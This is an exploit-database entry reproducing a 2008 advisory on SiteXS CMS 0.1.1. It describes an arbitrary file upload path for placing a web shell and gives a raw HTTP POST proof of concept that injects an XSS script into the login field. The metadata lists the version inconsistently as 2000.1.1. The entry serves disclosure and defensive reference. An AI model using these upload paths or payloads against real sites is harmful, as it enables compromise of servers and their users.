SiteXS CMS (Upload/XSS) Multiple Remote Vulnerabilities

vendor:

SiteXS CMS

by:

CWH Underground

8.8

CVSS

HIGH

Arbitrary File Upload and Remote XSS

CWE

Product Name: SiteXS CMS

Affected Version From: 2000.1.1

Affected Version To: 2000.1.1

Patch Exists: NO

Related CWE: N/A

CPE: a:sitexs:sitexs_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

SiteXS CMS (Upload/XSS) Multiple Remote Vulnerabilities

This Vulnerability can upload malicious files direct to web server. An attacker can exploit this vulnerability by sending a POST request with malicious JavaScript code to the target server.

Mitigation:

Ensure that the application is not vulnerable to XSS attacks by validating user input and encoding output.

Source

Exploit-DB raw data:

===========================================================
  SiteXS CMS (Upload/XSS) Multiple Remote Vulnerabilities
===========================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 21 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : SiteXS CMS
 VERSION     : 0.1.1
 DOWNLOAD    : http://downloads.sourceforge.net/sitexs
#####################################################

---Arbitrary File Upload Exploit---

	This Vulnerability can upload malicious files direct to web server.

[Login as user]

[+] Upload Path: http://[Target]/adm/?chid=4

[+] Shell Script: http://[Target]/download/[Evil File]


--- Remote XSS Exploit ---

-------------
 POC Exploit
-------------

[+] POST http://192.168.24.25/adm/ HTTP/1.0
[+] Accept: */*
[+] Content-Type: application/x-www-form-urlencoded
[+] User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
[+] Host: 192.168.24.25
[+] Content-Length: 44
[+] Cookie: PHPSESSID=aa2ded55802cd2b6fe7c304258d858f5
[+]
[+] user=admin'<script>alert(123)</script>&pass=test

##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-21]